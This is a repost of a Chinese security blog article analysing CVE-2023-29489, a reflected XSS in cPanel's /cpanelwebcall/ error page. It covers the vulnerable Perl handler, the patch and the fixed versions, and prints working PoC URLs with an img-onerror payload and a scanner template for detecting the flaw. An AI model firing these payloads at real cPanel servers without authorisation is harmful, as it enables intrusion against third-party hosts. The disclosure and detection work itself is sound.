主頁 >  其他 > cPanel XSS漏洞分析研究(CVE-2023-29489)

cPanel XSS漏洞分析研究(CVE-2023-29489)

2023-05-05 08:19:59 其他

一、漏洞原理

漏洞簡述

cPanel 是一套在網頁寄存業中最享負盛名的商業軟體,是基于于 Linux 和 BSD 系統及以 PHP 開發且性質為閉源軟體;提供了足夠強大和相當完整的主機管理功能,諸如:Webmail 及多種電郵協議、網頁化 FTP 管理、SSH 連線、資料庫管理系統、DNS 管理等遠端網頁式主機管理軟體功能,

該漏洞可以無身份驗證情況下利用,無論cPanel管理埠2080, 2082, 2083, 2086是否對外開放

漏洞影響范圍

供應商:cPanel

產品:cPanel

確認受影響版本:< 11.109.9999.116

修復版本:11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31

漏洞分析

本漏洞的漏洞點來自系統中涉及互動的關鍵變數未進行轉義或過濾處理,導致攻擊者可以構造惡意代碼作為輸入進行利用,

Httpd.pm:

elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
?
    # First 15 chars are “/cpanelwebcall/”
    _serve_cpanelwebcall(
        $self->get_server_obj(),
        substr( $doc_path, 15 ),
    );
}

上述代碼說明任何路徑均會被路由到,包括目錄后的字符部分,

其中涉及函式_serve_cpanelwebcall:

sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
    require Cpanel::Server::WebCalls;
    my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);
?
    $server_obj->respond_200_ok_text($out);
    
    return;
?
}

其中區域變數out為handle函式的回傳值,是引數webcall_uri_piece的處理結果,

sub handle ($request) {
?
    my $id = extract_id_from_request($request);
    substr( $request, 0, length $id ) = q<>;
?
    Cpanel::WebCalls::ID::is_valid($id) or do {
        die _http_invalid_params_err("Invalid webcall ID: $id");
    };

handle函式主要先從request提取id,之后根據id情況進行處理

sub _http_invalid_params_err ($why) {
    return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
}

_http_invalid_params_err函式主要是回傳錯誤資訊

進一步分析發現Httpd::ErrorPage下的 message_html變數未做任何處理,可被該漏洞利用

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

補丁部分

在最新版本cPanel可以看到針對該漏洞進行修復

Cpanel/Server/Handlers/Httpd/ErrorPage.pm:

++ use Cpanel::Encoder::Tiny               ();  
?
... omitted for brevity ...
?
++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );

二、漏洞復現實戰

漏洞復現

首先以某個cPanel target為例

cPanel資產

之后根據POC進行復現

POC

http://example.com/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa

注:其他埠也有可能存在該漏洞

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=https://www.cnblogs.com/hetianlab/p/x%20onerror="prompt(1)">aaaaaaaaaaaa'
    matchers:
      - type: word
        words:
          - '<img src=https://www.cnblogs.com/hetianlab/p/x one rror="prompt(1)">'

執行POC

XSS POC執行情況

漏洞修復

建議更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31

啟用cPanel 自動更新功能

結束語

本文主要介紹了CVE-2023-29489 cPanel XSS漏洞的原理分析及復現程序,漏洞主要由于涉及互動的關鍵變數未進行轉義或過濾處理,從而造成攻擊者可以在無身份驗證情況下進行利用,

更多網安技能的在線實操練習,請點擊這里>>

 

合天智匯:合天網路靶場、網安實戰虛擬環境

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/551612.html

標籤:其他

上一篇:再一次,實作聽歌自由

下一篇:返回列表

標籤雲
其他(158405) Python(38117) JavaScript(25399) Java(18012) C(15221) 區塊鏈(8261) C#(7972) AI(7469) 爪哇(7425) MySQL(7157) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5871) 数组(5741) R(5409) Linux(5334) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4565) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2432) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1964) Web開發(1951) HtmlCss(1931) python-3.x(1918) 弹簧靴(1913) C++(1912) xml(1889) PostgreSQL(1874) .NETCore(1857) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • cPanel XSS漏洞分析研究(CVE-2023-29489)

    cPanel 是一套在網頁寄存業中最享負盛名的商業軟體,是基于于 Linux 和 BSD 系統及以 PHP 開發且性質為閉源軟體;提供了足夠強大和相當完整的主機管理功能,諸如:Webmail 及多種電郵協議、網頁化 FTP 管理、SSH 連線、資料庫管理系統、DNS 管理等遠端網頁式主機管理軟體功能... ......

    uj5u.com 2023-05-05 08:19:59 more
  • 再一次,實作聽歌自由

    20年前,中國網民聽歌是自由的,準確點說是聽盜版歌的自由。2002年11月,百度上線MP3搜索功能,幾乎能搜索和下載到所有的歌曲。按相關的著作權法規,百度未經授權使用他人資源牟利是違法的。當時互聯網產業違法采集資料、傳播盜版是家常便飯,著作權管理形同虛設,百度順勢而為分了一塊大蛋糕。盜版音樂砸了音樂人的... ......

    uj5u.com 2023-05-04 08:01:43 more
  • 函式呼叫堆疊的一些簡單認識

    程式的執行可以理解為連續的函式呼叫,每一個用戶態(用戶態指的是CPU指令集權限ring 0,用戶只能訪問常用CPU指令集,在應用程式中運行)行程都對應一個呼叫堆疊結構,當一個函式執行完畢后,會自動回到原先呼叫函式的位置(call指令)的下一步命令并執行,堆疊結構的作用是保存函式回傳地址、傳遞函式引數、 ......

    uj5u.com 2023-05-04 08:01:36 more
  • 【經濟機器是如何運行的】30分鐘看懂經濟的本質(無數大佬推薦)建議

    視頻來源: https://www.bilibili.com/video/BV1qG4y157qp/?share_source=copy_web&vd_source=185624f32058093bb3ad55ee7f1c12b1 總結: 1、不要讓債務的增長速度超過收入。 當債務增長速度超過的你的 ......

    uj5u.com 2023-05-04 08:01:32 more
  • kubernetes入門

    一.導言 隨著容器技術的發展,軟體界對容器管理的需求越來越迫切,于是出現了一些kubernetes(即k8s),docker swarm 等容器管理軟體。同時k8s等服務編排軟體也讓微服務變得可行,快速擴容縮容,自動處理網路配置等特性也讓k8s如火如荼。 k8s能做什么? 服務發現和負載均衡,使用d ......

    uj5u.com 2023-05-04 08:01:15 more
  • dqwwn1-服務器弱點

    主機發現 sudo nmap -sn 192.168.28.0/24 TCP埠掃描:sudo nmap -sT --min-rate 1000 -p- 192.168.28.34 -oA nmapscan/ports TCP埠版本掃描sudo nmap -sT -sV -sC -O -p22,8 ......

    uj5u.com 2023-05-04 07:55:49 more
  • 再一次,實作聽歌自由

    20年前,中國網民聽歌是自由的,準確點說是聽盜版歌的自由。2002年11月,百度上線MP3搜索功能,幾乎能搜索和下載到所有的歌曲。按相關的著作權法規,百度未經授權使用他人資源牟利是違法的。當時互聯網產業違法采集資料、傳播盜版是家常便飯,著作權管理形同虛設,百度順勢而為分了一塊大蛋糕。盜版音樂砸了音樂人的... ......

    uj5u.com 2023-05-04 07:39:47 more
  • 【經濟機器是如何運行的】30分鐘看懂經濟的本質(無數大佬推薦)建議

    視頻來源: https://www.bilibili.com/video/BV1qG4y157qp/?share_source=copy_web&vd_source=185624f32058093bb3ad55ee7f1c12b1 總結: 1、不要讓債務的增長速度超過收入。 當債務增長速度超過的你的 ......

    uj5u.com 2023-05-04 07:39:14 more
  • 函式呼叫堆疊的一些簡單認識

    程式的執行可以理解為連續的函式呼叫,每一個用戶態(用戶態指的是CPU指令集權限ring 0,用戶只能訪問常用CPU指令集,在應用程式中運行)行程都對應一個呼叫堆疊結構,當一個函式執行完畢后,會自動回到原先呼叫函式的位置(call指令)的下一步命令并執行,堆疊結構的作用是保存函式回傳地址、傳遞函式引數、 ......

    uj5u.com 2023-05-04 07:38:35 more
  • dqwwn1-服務器弱點

    主機發現 sudo nmap -sn 192.168.28.0/24 TCP埠掃描:sudo nmap -sT --min-rate 1000 -p- 192.168.28.34 -oA nmapscan/ports TCP埠版本掃描sudo nmap -sT -sV -sC -O -p22,8 ......

    uj5u.com 2023-05-04 07:38:21 more